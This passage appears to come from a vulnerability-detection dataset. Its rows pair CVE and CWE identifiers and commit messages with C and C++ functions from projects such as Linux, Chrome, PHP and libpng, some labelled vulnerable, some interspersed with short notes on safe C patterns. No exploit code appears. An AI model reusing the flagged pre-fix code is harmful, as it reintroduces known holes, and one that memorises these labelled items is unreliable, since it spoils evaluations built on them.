pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = 4;
pairs[i].isnull = true;
pairs[i].needfree = false;
}
else
{
pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = VARDATA_ANY(in_datums[i * 2 + 1]);
pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = hstoreCheckValLen(VARSIZE_ANY_EXHDR(in_datums[i * 2 + 1]));
pairs[i].isnull = false;
pairs[i].needfree = false;
}
}
count = hstoreUniquePairs(pairs, count, &buflen);
out = hstorePairs(pairs, count, buflen);
PG_RETURN_POINTER(out);
}
| C | postgres | 1 |
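The guard added in the func_after version above, count > MaxAllocSize / sizeof(Pairs), is the general rule of checking by division before multiplying an allocation size. A standalone version of the same idea in plain C, with SIZE_MAX standing in for PostgreSQL's MaxAllocSize:

#include <stdint.h>
#include <stdlib.h>

/* Refuse the request when count * elemsize would wrap, instead of letting
 * the multiplication overflow to a small value and under-allocating. */
static void *alloc_array_checked(size_t count, size_t elemsize)
{
    if (elemsize != 0 && count > SIZE_MAX / elemsize)
        return NULL;                     /* product would not fit in size_t */
    return malloc(count * elemsize);     /* safe: product is representable */
}

The same division-based test appears, with PostgreSQL's own limit and error reporting, in the func_after column of this record.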
CVE-2015-6773 | https://www.cvedetails.com/cve/CVE-2015-6773/ | CWE-119 | https://github.com/chromium/chromium/commit/33827275411b33371e7bb750cce20f11de85002d | 33827275411b33371e7bb750cce20f11de85002d | Move SelectionTemplate::is_handle_visible_ to FrameSelection
This patch moves |is_handle_visible_| to |FrameSelection| from |SelectionTemplate|
since handle visibility is used only for setting |FrameSelection|, hence it is
a redundant member variable of |SelectionTemplate|.
Bug: 742093
Change-Id: I3add4da3844fb40be34dcb4d4b46b5fa6fed1d7e
Reviewed-on: https://chromium-review.googlesource.com/595389
Commit-Queue: Yoshifumi Inoue <yosin@chromium.org>
Reviewed-by: Xiaocheng Hu <xiaochengh@chromium.org>
Reviewed-by: Kent Tamura <tkent@chromium.org>
Cr-Commit-Position: refs/heads/master@{#491660} | DispatchEventResult DispatchSelectStart(Node* node) {
if (!node || !node->GetLayoutObject())
return DispatchEventResult::kNotCanceled;
return node->DispatchEvent(
Event::CreateCancelableBubble(EventTypeNames::selectstart));
}
| DispatchEventResult DispatchSelectStart(Node* node) {
if (!node || !node->GetLayoutObject())
return DispatchEventResult::kNotCanceled;
return node->DispatchEvent(
Event::CreateCancelableBubble(EventTypeNames::selectstart));
}
| C | Chrome | 0 |
CVE-2011-4718 | https://www.cvedetails.com/cve/CVE-2011-4718/ | CWE-264 | https://git.php.net/?p=php-src.git;a=commit;h=25e8fcc88fa20dc9d4c47184471003f436927cde | 25e8fcc88fa20dc9d4c47184471003f436927cde | null | static inline void php_rinit_session_globals(TSRMLS_D) /* {{{ */
{
PS(mod_data) = NULL;
PS(mod_user_is_open) = 0;
/* Do NOT init PS(mod_user_names) here! */
PS(http_session_vars) = NULL;
}
/* }}} */
| static inline void php_rinit_session_globals(TSRMLS_D) /* {{{ */
{
PS(mod_data) = NULL;
PS(mod_user_is_open) = 0;
/* Do NOT init PS(mod_user_names) here! */
PS(http_session_vars) = NULL;
}
/* }}} */
| C | php | 0 |
null | null | null | https://github.com/chromium/chromium/commit/fc790462b4f248712bbc8c3734664dd6b05f80f2 | fc790462b4f248712bbc8c3734664dd6b05f80f2 | Set the job name for the print job on the Mac.
BUG=http://crbug.com/29188
TEST=as in bug
Review URL: http://codereview.chromium.org/1997016
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@47056 0039d316-1c4b-4281-b951-d872f2087c98 | void ResourceMessageFilter::OnCreateWorker(
const ViewHostMsg_CreateWorker_Params& params, int* route_id) {
*route_id = params.route_id != MSG_ROUTING_NONE ?
params.route_id : render_widget_helper_->GetNextRoutingID();
WorkerService::GetInstance()->CreateWorker(
params.url, params.is_shared, off_the_record(), params.name,
params.document_id, id(), params.render_view_route_id, this, *route_id,
db_dispatcher_host_->database_tracker(),
GetRequestContextForURL(params.url)->host_content_settings_map());
}
| void ResourceMessageFilter::OnCreateWorker(
const ViewHostMsg_CreateWorker_Params& params, int* route_id) {
*route_id = params.route_id != MSG_ROUTING_NONE ?
params.route_id : render_widget_helper_->GetNextRoutingID();
WorkerService::GetInstance()->CreateWorker(
params.url, params.is_shared, off_the_record(), params.name,
params.document_id, id(), params.render_view_route_id, this, *route_id,
db_dispatcher_host_->database_tracker(),
GetRequestContextForURL(params.url)->host_content_settings_map());
}
| C | Chrome | 0 |
CVE-2017-12588 | https://www.cvedetails.com/cve/CVE-2017-12588/ | CWE-134 | https://github.com/rsyslog/rsyslog/commit/062d0c671a29f7c6f7dff4a2f1f35df375bbb30b | 062d0c671a29f7c6f7dff4a2f1f35df375bbb30b | Merge pull request #1565 from Whissi/fix-format-security-issue-in-zmq-modules
Fix format security issue in zmq3 modules | std_checkRuleset_genErrMsg(__attribute__((unused)) modConfData_t *modConf, instanceConf_t *inst)
{
errmsg.LogError(0, NO_ERRCODE, "imzmq3: ruleset '%s' for socket %s not found - "
"using default ruleset instead", inst->pszBindRuleset,
inst->description);
}
| std_checkRuleset_genErrMsg(__attribute__((unused)) modConfData_t *modConf, instanceConf_t *inst)
{
errmsg.LogError(0, NO_ERRCODE, "imzmq3: ruleset '%s' for socket %s not found - "
"using default ruleset instead", inst->pszBindRuleset,
inst->description);
}
| C | rsyslog | 0 |
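"Format security" in the pull-request title above refers to the classic bug of passing externally influenced text as the format argument itself; the function stored in this record already uses a constant format string. A minimal generic illustration, with printf() standing in for the module's logging call:

#include <stdio.h>

static void log_bad(const char *user_text)
{
    printf(user_text);          /* BAD: any %s/%n in user_text is interpreted */
}

static void log_good(const char *user_text)
{
    printf("%s", user_text);    /* GOOD: user_text is treated purely as data */
}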
CVE-2014-9903 | https://www.cvedetails.com/cve/CVE-2014-9903/ | CWE-200 | https://github.com/torvalds/linux/commit/4efbc454ba68def5ef285b26ebfcfdb605b52755 | 4efbc454ba68def5ef285b26ebfcfdb605b52755 | sched: Fix information leak in sys_sched_getattr()
We're copying the on-stack structure to userspace, but forgot to give
the right number of bytes to copy. This allows the calling process to
obtain up to PAGE_SIZE bytes from the stack (and possibly adjacent
kernel memory).
This fix copies only as much as we actually have on the stack
(attr->size defaults to the size of the struct) and leaves the rest of
the userspace-provided buffer untouched.
Found using kmemcheck + trinity.
Fixes: d50dde5a10f30 ("sched: Add new scheduler syscalls to support an extended scheduling parameters ABI")
Cc: Dario Faggioli <raistlin@linux.it>
Cc: Juri Lelli <juri.lelli@gmail.com>
Cc: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Peter Zijlstra <peterz@infradead.org>
Link: http://lkml.kernel.org/r/1392585857-10725-1-git-send-email-vegard.nossum@oracle.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de> | bool __dl_overflow(struct dl_bw *dl_b, int cpus, u64 old_bw, u64 new_bw)
{
return dl_b->bw != -1 &&
dl_b->bw * cpus < dl_b->total_bw - old_bw + new_bw;
}
| bool __dl_overflow(struct dl_bw *dl_b, int cpus, u64 old_bw, u64 new_bw)
{
return dl_b->bw != -1 &&
dl_b->bw * cpus < dl_b->total_bw - old_bw + new_bw;
}
| C | linux | 0 |
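The function stored in this record is an unrelated helper from the same file; the leak was in the path that copies a struct sched_attr back to userspace. A hedged user-space sketch of the fix described above, copying only the bytes the kernel filled in (kattr.size) rather than the caller-supplied buffer size, with copy_out() standing in for copy_to_user() and the struct reduced to a placeholder:

#include <stddef.h>
#include <string.h>

struct attr_sketch {
    unsigned int size;          /* how many bytes of this struct are valid */
    int policy;
    /* ... further fields ... */
};

static int copy_out(void *dst, const void *src, size_t len)
{
    memcpy(dst, src, len);      /* stands in for copy_to_user() */
    return 0;
}

static int read_attr_sketch(void *ubuf, size_t usize)
{
    struct attr_sketch kattr;

    memset(&kattr, 0, sizeof(kattr));   /* no uninitialized stack bytes */
    kattr.size = sizeof(kattr);
    kattr.policy = 0;
    /* Copy kattr.size bytes, not usize: anything beyond what the kernel
     * initialized never reaches the user buffer. */
    (void) usize;
    return copy_out(ubuf, &kattr, kattr.size);
}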
CVE-2011-4112 | https://www.cvedetails.com/cve/CVE-2011-4112/ | CWE-264 | https://github.com/torvalds/linux/commit/550fd08c2cebad61c548def135f67aba284c6162 | 550fd08c2cebad61c548def135f67aba284c6162 | net: Audit drivers to identify those needing IFF_TX_SKB_SHARING cleared
After the last patch, we are left in a state in which only drivers calling
ether_setup have IFF_TX_SKB_SHARING set (we assume that drivers touching real
hardware call ether_setup for their net_devices and don't hold any state in
their skbs. There are a handful of drivers that violate this assumption of
course, and need to be fixed up. This patch identifies those drivers, and marks
them as not being able to support the safe transmission of skbs by clearing the
IFF_TX_SKB_SHARING flag in priv_flags
Signed-off-by: Neil Horman <nhorman@tuxdriver.com>
CC: Karsten Keil <isdn@linux-pingi.de>
CC: "David S. Miller" <davem@davemloft.net>
CC: Jay Vosburgh <fubar@us.ibm.com>
CC: Andy Gospodarek <andy@greyhouse.net>
CC: Patrick McHardy <kaber@trash.net>
CC: Krzysztof Halasa <khc@pm.waw.pl>
CC: "John W. Linville" <linville@tuxdriver.com>
CC: Greg Kroah-Hartman <gregkh@suse.de>
CC: Marcel Holtmann <marcel@holtmann.org>
CC: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net> | static int airo_set_essid(struct net_device *dev,
struct iw_request_info *info,
struct iw_point *dwrq,
char *extra)
{
struct airo_info *local = dev->ml_priv;
SsidRid SSID_rid; /* SSIDs */
/* Reload the list of current SSID */
readSsidRid(local, &SSID_rid);
/* Check if we asked for `any' */
if (dwrq->flags == 0) {
/* Just send an empty SSID list */
memset(&SSID_rid, 0, sizeof(SSID_rid));
} else {
unsigned index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
/* Check the size of the string */
if (dwrq->length > IW_ESSID_MAX_SIZE)
return -E2BIG ;
/* Check if index is valid */
if (index >= ARRAY_SIZE(SSID_rid.ssids))
return -EINVAL;
/* Set the SSID */
memset(SSID_rid.ssids[index].ssid, 0,
sizeof(SSID_rid.ssids[index].ssid));
memcpy(SSID_rid.ssids[index].ssid, extra, dwrq->length);
SSID_rid.ssids[index].len = cpu_to_le16(dwrq->length);
}
SSID_rid.len = cpu_to_le16(sizeof(SSID_rid));
/* Write it to the card */
disable_MAC(local, 1);
writeSsidRid(local, &SSID_rid, 1);
enable_MAC(local, 1);
return 0;
}
| static int airo_set_essid(struct net_device *dev,
struct iw_request_info *info,
struct iw_point *dwrq,
char *extra)
{
struct airo_info *local = dev->ml_priv;
SsidRid SSID_rid; /* SSIDs */
/* Reload the list of current SSID */
readSsidRid(local, &SSID_rid);
/* Check if we asked for `any' */
if (dwrq->flags == 0) {
/* Just send an empty SSID list */
memset(&SSID_rid, 0, sizeof(SSID_rid));
} else {
unsigned index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
/* Check the size of the string */
if (dwrq->length > IW_ESSID_MAX_SIZE)
return -E2BIG ;
/* Check if index is valid */
if (index >= ARRAY_SIZE(SSID_rid.ssids))
return -EINVAL;
/* Set the SSID */
memset(SSID_rid.ssids[index].ssid, 0,
sizeof(SSID_rid.ssids[index].ssid));
memcpy(SSID_rid.ssids[index].ssid, extra, dwrq->length);
SSID_rid.ssids[index].len = cpu_to_le16(dwrq->length);
}
SSID_rid.len = cpu_to_le16(sizeof(SSID_rid));
/* Write it to the card */
disable_MAC(local, 1);
writeSsidRid(local, &SSID_rid, 1);
enable_MAC(local, 1);
return 0;
}
| C | linux | 0 |
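The per-driver change described above is small: right after ether_setup() has installed the default flags, a driver that keeps private state in its skbs clears IFF_TX_SKB_SHARING. A sketch of that pattern in kernel context (assumes <linux/etherdevice.h> and <linux/netdevice.h>); it is not the exact hunk applied to each driver:

#include <linux/etherdevice.h>
#include <linux/netdevice.h>

static void example_netdev_setup(struct net_device *dev)
{
	ether_setup(dev);                       /* sets the default priv_flags */
	dev->priv_flags &= ~IFF_TX_SKB_SHARING; /* this driver must not share TX skbs */
}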
CVE-2015-1229 | https://www.cvedetails.com/cve/CVE-2015-1229/ | CWE-19 | https://github.com/chromium/chromium/commit/7933c117fd16b192e70609c331641e9112af5e42 | 7933c117fd16b192e70609c331641e9112af5e42 | Sanitize headers in Proxy Authentication Required responses
BUG=431504
Review URL: https://codereview.chromium.org/769043003
Cr-Commit-Position: refs/heads/master@{#310014} | void MockGenerateRandom1(uint8* output, size_t n) {
static const uint8 bytes[] = {
0x55, 0x29, 0x66, 0x26, 0x6b, 0x9c, 0x73, 0x54
};
static size_t current_byte = 0;
for (size_t i = 0; i < n; ++i) {
output[i] = bytes[current_byte++];
current_byte %= arraysize(bytes);
}
}
| void MockGenerateRandom1(uint8* output, size_t n) {
static const uint8 bytes[] = {
0x55, 0x29, 0x66, 0x26, 0x6b, 0x9c, 0x73, 0x54
};
static size_t current_byte = 0;
for (size_t i = 0; i < n; ++i) {
output[i] = bytes[current_byte++];
current_byte %= arraysize(bytes);
}
}
| C | Chrome | 0 |
CVE-2014-4014 | https://www.cvedetails.com/cve/CVE-2014-4014/ | CWE-264 | https://github.com/torvalds/linux/commit/23adbe12ef7d3d4195e80800ab36b37bee28cd03 | 23adbe12ef7d3d4195e80800ab36b37bee28cd03 | fs,userns: Change inode_capable to capable_wrt_inode_uidgid
The kernel has no concept of capabilities with respect to inodes; inodes
exist independently of namespaces. For example, inode_capable(inode,
CAP_LINUX_IMMUTABLE) would be nonsense.
This patch changes inode_capable to check for uid and gid mappings and
renames it to capable_wrt_inode_uidgid, which should make it more
obvious what it does.
Fixes CVE-2014-4014.
Cc: Theodore Ts'o <tytso@mit.edu>
Cc: Serge Hallyn <serge.hallyn@ubuntu.com>
Cc: "Eric W. Biederman" <ebiederm@xmission.com>
Cc: Dave Chinner <david@fromorbit.com>
Cc: stable@vger.kernel.org
Signed-off-by: Andy Lutomirski <luto@amacapital.net>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | static void evict(struct inode *inode)
{
const struct super_operations *op = inode->i_sb->s_op;
BUG_ON(!(inode->i_state & I_FREEING));
BUG_ON(!list_empty(&inode->i_lru));
if (!list_empty(&inode->i_wb_list))
inode_wb_list_del(inode);
inode_sb_list_del(inode);
/*
* Wait for flusher thread to be done with the inode so that filesystem
* does not start destroying it while writeback is still running. Since
* the inode has I_FREEING set, flusher thread won't start new work on
* the inode. We just have to wait for running writeback to finish.
*/
inode_wait_for_writeback(inode);
if (op->evict_inode) {
op->evict_inode(inode);
} else {
truncate_inode_pages_final(&inode->i_data);
clear_inode(inode);
}
if (S_ISBLK(inode->i_mode) && inode->i_bdev)
bd_forget(inode);
if (S_ISCHR(inode->i_mode) && inode->i_cdev)
cd_forget(inode);
remove_inode_hash(inode);
spin_lock(&inode->i_lock);
wake_up_bit(&inode->i_state, __I_NEW);
BUG_ON(inode->i_state != (I_FREEING | I_CLEAR));
spin_unlock(&inode->i_lock);
destroy_inode(inode);
}
| static void evict(struct inode *inode)
{
const struct super_operations *op = inode->i_sb->s_op;
BUG_ON(!(inode->i_state & I_FREEING));
BUG_ON(!list_empty(&inode->i_lru));
if (!list_empty(&inode->i_wb_list))
inode_wb_list_del(inode);
inode_sb_list_del(inode);
/*
* Wait for flusher thread to be done with the inode so that filesystem
* does not start destroying it while writeback is still running. Since
* the inode has I_FREEING set, flusher thread won't start new work on
* the inode. We just have to wait for running writeback to finish.
*/
inode_wait_for_writeback(inode);
if (op->evict_inode) {
op->evict_inode(inode);
} else {
truncate_inode_pages_final(&inode->i_data);
clear_inode(inode);
}
if (S_ISBLK(inode->i_mode) && inode->i_bdev)
bd_forget(inode);
if (S_ISCHR(inode->i_mode) && inode->i_cdev)
cd_forget(inode);
remove_inode_hash(inode);
spin_lock(&inode->i_lock);
wake_up_bit(&inode->i_state, __I_NEW);
BUG_ON(inode->i_state != (I_FREEING | I_CLEAR));
spin_unlock(&inode->i_lock);
destroy_inode(inode);
}
| C | linux | 0 |
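The rename described above also tightens the check: a capability is honoured for an inode only if the inode's uid and gid map into the caller's user namespace. A hedged reconstruction of that helper, written from the commit message rather than copied from the kernel, assuming the usual capability, cred and user-namespace headers:

#include <linux/capability.h>
#include <linux/cred.h>
#include <linux/fs.h>
#include <linux/user_namespace.h>

static bool capable_wrt_inode_uidgid_sketch(const struct inode *inode, int cap)
{
	struct user_namespace *ns = current_user_ns();

	/* The capability only counts if the inode's owner and group are
	 * mappable inside the caller's user namespace. */
	return ns_capable(ns, cap) &&
	       kuid_has_mapping(ns, inode->i_uid) &&
	       kgid_has_mapping(ns, inode->i_gid);
}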
CVE-2014-1700 | https://www.cvedetails.com/cve/CVE-2014-1700/ | CWE-399 | https://github.com/chromium/chromium/commit/685c3980d31b5199924086b8c93a1ce751d24733 | 685c3980d31b5199924086b8c93a1ce751d24733 | content: Rename webkit_test_helpers.{cc,h} to blink_test_helpers.{cc,h}
Now that webkit/ is gone, we are preparing ourselves for the merge of
third_party/WebKit into //blink.
BUG=None
BUG=content_shell && content_unittests
R=avi@chromium.org
Review URL: https://codereview.chromium.org/1118183003
Cr-Commit-Position: refs/heads/master@{#328202} | void ShellContentBrowserClient::GetAdditionalMappedFilesForChildProcess(
const base::CommandLine& command_line,
int child_process_id,
FileDescriptorInfo* mappings) {
#if defined(V8_USE_EXTERNAL_STARTUP_DATA)
if (v8_natives_fd_.get() == -1 || v8_snapshot_fd_.get() == -1) {
int v8_natives_fd = -1;
int v8_snapshot_fd = -1;
if (gin::V8Initializer::OpenV8FilesForChildProcesses(&v8_natives_fd,
&v8_snapshot_fd)) {
v8_natives_fd_.reset(v8_natives_fd);
v8_snapshot_fd_.reset(v8_snapshot_fd);
}
}
DCHECK(v8_natives_fd_.get() != -1 && v8_snapshot_fd_.get() != -1);
mappings->Share(kV8NativesDataDescriptor, v8_natives_fd_.get());
mappings->Share(kV8SnapshotDataDescriptor, v8_snapshot_fd_.get());
#endif // V8_USE_EXTERNAL_STARTUP_DATA
#if defined(OS_ANDROID)
int flags = base::File::FLAG_OPEN | base::File::FLAG_READ;
base::FilePath pak_file;
bool r = PathService::Get(base::DIR_ANDROID_APP_DATA, &pak_file);
CHECK(r);
pak_file = pak_file.Append(FILE_PATH_LITERAL("paks"));
pak_file = pak_file.Append(FILE_PATH_LITERAL("content_shell.pak"));
base::File f(pak_file, flags);
if (!f.IsValid()) {
NOTREACHED() << "Failed to open file when creating renderer process: "
<< "content_shell.pak";
}
mappings->Transfer(kShellPakDescriptor, base::ScopedFD(f.TakePlatformFile()));
if (breakpad::IsCrashReporterEnabled()) {
f = breakpad::CrashDumpManager::GetInstance()->CreateMinidumpFile(
child_process_id);
if (!f.IsValid()) {
LOG(ERROR) << "Failed to create file for minidump, crash reporting will "
<< "be disabled for this process.";
} else {
mappings->Transfer(kAndroidMinidumpDescriptor,
base::ScopedFD(f.TakePlatformFile()));
}
}
#else // !defined(OS_ANDROID)
int crash_signal_fd = GetCrashSignalFD(command_line);
if (crash_signal_fd >= 0) {
mappings->Share(kCrashDumpSignal, crash_signal_fd);
}
#endif // defined(OS_ANDROID)
}
| void ShellContentBrowserClient::GetAdditionalMappedFilesForChildProcess(
const base::CommandLine& command_line,
int child_process_id,
FileDescriptorInfo* mappings) {
#if defined(V8_USE_EXTERNAL_STARTUP_DATA)
if (v8_natives_fd_.get() == -1 || v8_snapshot_fd_.get() == -1) {
int v8_natives_fd = -1;
int v8_snapshot_fd = -1;
if (gin::V8Initializer::OpenV8FilesForChildProcesses(&v8_natives_fd,
&v8_snapshot_fd)) {
v8_natives_fd_.reset(v8_natives_fd);
v8_snapshot_fd_.reset(v8_snapshot_fd);
}
}
DCHECK(v8_natives_fd_.get() != -1 && v8_snapshot_fd_.get() != -1);
mappings->Share(kV8NativesDataDescriptor, v8_natives_fd_.get());
mappings->Share(kV8SnapshotDataDescriptor, v8_snapshot_fd_.get());
#endif // V8_USE_EXTERNAL_STARTUP_DATA
#if defined(OS_ANDROID)
int flags = base::File::FLAG_OPEN | base::File::FLAG_READ;
base::FilePath pak_file;
bool r = PathService::Get(base::DIR_ANDROID_APP_DATA, &pak_file);
CHECK(r);
pak_file = pak_file.Append(FILE_PATH_LITERAL("paks"));
pak_file = pak_file.Append(FILE_PATH_LITERAL("content_shell.pak"));
base::File f(pak_file, flags);
if (!f.IsValid()) {
NOTREACHED() << "Failed to open file when creating renderer process: "
<< "content_shell.pak";
}
mappings->Transfer(kShellPakDescriptor, base::ScopedFD(f.TakePlatformFile()));
if (breakpad::IsCrashReporterEnabled()) {
f = breakpad::CrashDumpManager::GetInstance()->CreateMinidumpFile(
child_process_id);
if (!f.IsValid()) {
LOG(ERROR) << "Failed to create file for minidump, crash reporting will "
<< "be disabled for this process.";
} else {
mappings->Transfer(kAndroidMinidumpDescriptor,
base::ScopedFD(f.TakePlatformFile()));
}
}
#else // !defined(OS_ANDROID)
int crash_signal_fd = GetCrashSignalFD(command_line);
if (crash_signal_fd >= 0) {
mappings->Share(kCrashDumpSignal, crash_signal_fd);
}
#endif // defined(OS_ANDROID)
}
| C | Chrome | 0 |
CVE-2012-5136 | https://www.cvedetails.com/cve/CVE-2012-5136/ | CWE-20 | https://github.com/chromium/chromium/commit/401d30ef93030afbf7e81e53a11b68fc36194502 | 401d30ef93030afbf7e81e53a11b68fc36194502 | Refactoring: Move m_mayDisplaySeamlesslyWithParent down to Document
The member is used only in Document, thus no reason to
stay in SecurityContext.
TEST=none
BUG=none
R=haraken@chromium.org, abarth, haraken, hayato
Review URL: https://codereview.chromium.org/27615003
git-svn-id: svn://svn.chromium.org/blink/trunk@159829 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void Document::clearAXObjectCache()
{
ASSERT(topDocument() == this);
m_axObjectCache.clear();
}
| void Document::clearAXObjectCache()
{
ASSERT(topDocument() == this);
m_axObjectCache.clear();
}
| C | Chrome | 0 |
CVE-2017-11171 | https://www.cvedetails.com/cve/CVE-2017-11171/ | CWE-835 | https://github.com/GNOME/gnome-session/commit/b0dc999e0b45355314616321dbb6cb71e729fc9d | b0dc999e0b45355314616321dbb6cb71e729fc9d | [gsm] Delay the creation of the GsmXSMPClient until it really exists
We used to create the GsmXSMPClient before the XSMP connection is really
accepted. This can lead to some issues, though. An example is:
https://bugzilla.gnome.org/show_bug.cgi?id=598211#c19. Quoting:
"What is happening is that a new client (probably metacity in your
case) is opening an ICE connection in the GSM_MANAGER_PHASE_END_SESSION
phase, which causes a new GsmXSMPClient to be added to the client
store. The GSM_MANAGER_PHASE_EXIT phase then begins before the client
has had a chance to establish a xsmp connection, which means that
client->priv->conn will not be initialized at the point that xsmp_stop
is called on the new unregistered client."
The fix is to create the GsmXSMPClient object when there's a real XSMP
connection. This implies moving the timeout that makes sure we don't
have an empty client to the XSMP server.
https://bugzilla.gnome.org/show_bug.cgi?id=598211 | ice_error_handler (IceConn conn,
Bool swap,
int offending_minor_opcode,
unsigned long offending_sequence,
int error_class,
int severity,
IcePointer values)
{
g_debug ("GsmXsmpServer: ice_error_handler (%p, %s, %d, %lx, %d, %d)",
conn, swap ? "TRUE" : "FALSE", offending_minor_opcode,
offending_sequence, error_class, severity);
if (severity == IceCanContinue) {
return;
}
/* FIXME: the ICElib docs are completely vague about what we're
* supposed to do in this case. Need to verify that calling
* IceCloseConnection() here is guaranteed to cause neither
* free-memory-reads nor leaks.
*/
IceCloseConnection (conn);
}
| ice_error_handler (IceConn conn,
Bool swap,
int offending_minor_opcode,
unsigned long offending_sequence,
int error_class,
int severity,
IcePointer values)
{
g_debug ("GsmXsmpServer: ice_error_handler (%p, %s, %d, %lx, %d, %d)",
conn, swap ? "TRUE" : "FALSE", offending_minor_opcode,
offending_sequence, error_class, severity);
if (severity == IceCanContinue) {
return;
}
/* FIXME: the ICElib docs are completely vague about what we're
* supposed to do in this case. Need to verify that calling
* IceCloseConnection() here is guaranteed to cause neither
* free-memory-reads nor leaks.
*/
IceCloseConnection (conn);
}
| C | gnome-session | 0 |
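The ordering problem described above is that a client object was created as soon as an ICE connection appeared, before the XSMP handshake, so later shutdown phases could act on a client whose connection pointer was still unset. A generic sketch of the safer ordering, creating the client only once the protocol-level connection exists, with made-up names rather than the gnome-session code:

#include <stdlib.h>

struct xsmp_conn;                       /* opaque: an accepted XSMP connection */

struct client {
    struct xsmp_conn *conn;             /* never NULL once the client exists */
};

static struct client *client_new_for_connection(struct xsmp_conn *conn)
{
    struct client *c;

    if (conn == NULL)                   /* no XSMP connection yet: no client */
        return NULL;
    c = malloc(sizeof *c);
    if (c != NULL)
        c->conn = conn;
    return c;
}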
CVE-2013-2906 | https://www.cvedetails.com/cve/CVE-2013-2906/ | CWE-362 | https://github.com/chromium/chromium/commit/603af455b5641671b18d7d7d166630341d71b63f | 603af455b5641671b18d7d7d166630341d71b63f | Remove dependency of TranslateInfobarDelegate on profile
This CL uses TranslateTabHelper instead of Profile and also cleans up
some unused code and irrelevant dependencies.
BUG=371845
Review URL: https://codereview.chromium.org/286973003
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@270758 0039d316-1c4b-4281-b951-d872f2087c98 | bool TranslateInfoBarDelegate::IsTranslatableLanguageByPrefs() {
TranslateTabHelper* translate_tab_helper =
TranslateTabHelper::FromWebContents(GetWebContents());
scoped_ptr<TranslatePrefs> translate_prefs(
TranslateTabHelper::CreateTranslatePrefs(
translate_tab_helper->GetPrefs()));
TranslateAcceptLanguages* accept_languages =
translate_tab_helper->GetTranslateAcceptLanguages();
return translate_prefs->CanTranslateLanguage(accept_languages,
original_language_code());
}
| bool TranslateInfoBarDelegate::IsTranslatableLanguageByPrefs() {
Profile* profile =
Profile::FromBrowserContext(GetWebContents()->GetBrowserContext());
Profile* original_profile = profile->GetOriginalProfile();
scoped_ptr<TranslatePrefs> translate_prefs(
TranslateTabHelper::CreateTranslatePrefs(original_profile->GetPrefs()));
TranslateAcceptLanguages* accept_languages =
TranslateTabHelper::GetTranslateAcceptLanguages(original_profile);
return translate_prefs->CanTranslateLanguage(accept_languages,
original_language_code());
}
| C | Chrome | 1 |
CVE-2015-8126 | https://www.cvedetails.com/cve/CVE-2015-8126/ | CWE-119 | https://github.com/chromium/chromium/commit/7f3d85b096f66870a15b37c2f40b219b2e292693 | 7f3d85b096f66870a15b37c2f40b219b2e292693 | third_party/libpng: update to 1.2.54
TBR=darin@chromium.org
BUG=560291
Review URL: https://codereview.chromium.org/1467263003
Cr-Commit-Position: refs/heads/master@{#362298} | png_set_read_status_fn(png_structp png_ptr, png_read_status_ptr read_row_fn)
{
if (png_ptr == NULL)
return;
png_ptr->read_row_fn = read_row_fn;
}
| png_set_read_status_fn(png_structp png_ptr, png_read_status_ptr read_row_fn)
{
if (png_ptr == NULL)
return;
png_ptr->read_row_fn = read_row_fn;
}
| C | Chrome | 0 |
CVE-2017-15389 | https://www.cvedetails.com/cve/CVE-2017-15389/ | CWE-20 | https://github.com/chromium/chromium/commit/5788690fb1395dc672ff9b3385dbfb1180ed710a | 5788690fb1395dc672ff9b3385dbfb1180ed710a | mac: Make RWHVMac::ClearCompositorFrame clear locks
Ensure that the BrowserCompositorMac not hold on to a compositor lock
when requested to clear its compositor frame. This lock may be held
indefinitely (if the renderer hangs) and so the frame will never be
cleared.
Bug: 739621
Change-Id: I15d0e82bdf632f3379a48e959f198afb8a4ac218
Reviewed-on: https://chromium-review.googlesource.com/608239
Commit-Queue: ccameron chromium <ccameron@chromium.org>
Reviewed-by: Ken Buchanan <kenrb@chromium.org>
Cr-Commit-Position: refs/heads/master@{#493563} | void DelegatedFrameHost::ReturnSubscriberTexture(
base::WeakPtr<DelegatedFrameHost> dfh,
scoped_refptr<OwnedMailbox> subscriber_texture,
const gpu::SyncToken& sync_token) {
if (!subscriber_texture.get())
return;
if (!dfh)
return;
subscriber_texture->UpdateSyncToken(sync_token);
if (dfh->frame_subscriber_ && subscriber_texture->texture_id())
dfh->idle_frame_subscriber_textures_.push_back(subscriber_texture);
}
| void DelegatedFrameHost::ReturnSubscriberTexture(
base::WeakPtr<DelegatedFrameHost> dfh,
scoped_refptr<OwnedMailbox> subscriber_texture,
const gpu::SyncToken& sync_token) {
if (!subscriber_texture.get())
return;
if (!dfh)
return;
subscriber_texture->UpdateSyncToken(sync_token);
if (dfh->frame_subscriber_ && subscriber_texture->texture_id())
dfh->idle_frame_subscriber_textures_.push_back(subscriber_texture);
}
| C | Chrome | 0 |
CVE-2014-2706 | https://www.cvedetails.com/cve/CVE-2014-2706/ | CWE-362 | https://github.com/torvalds/linux/commit/1d147bfa64293b2723c4fec50922168658e613ba | 1d147bfa64293b2723c4fec50922168658e613ba | mac80211: fix AP powersave TX vs. wakeup race
There is a race between the TX path and the STA wakeup: while
a station is sleeping, mac80211 buffers frames until it wakes
up, then the frames are transmitted. However, the RX and TX
paths are concurrent, so the packet indicating wakeup can be
processed while a packet is being transmitted.
This can lead to a situation where the buffered frames list
is emptied on the one side, while a frame is being added on
the other side, as the station is still seen as sleeping in
the TX path.
As a result, the newly added frame will not be sent anytime
soon. It might be sent much later (and out of order) when the
station goes to sleep and wakes up the next time.
Additionally, it can lead to the crash below.
Fix all this by synchronising both paths with a new lock.
Neither path is a fast path, since they handle PS situations.
In a later patch we'll remove the extra skb queue locks to
reduce locking overhead.
BUG: unable to handle kernel
NULL pointer dereference at 000000b0
IP: [<ff6f1791>] ieee80211_report_used_skb+0x11/0x3e0 [mac80211]
*pde = 00000000
Oops: 0000 [#1] SMP DEBUG_PAGEALLOC
EIP: 0060:[<ff6f1791>] EFLAGS: 00210282 CPU: 1
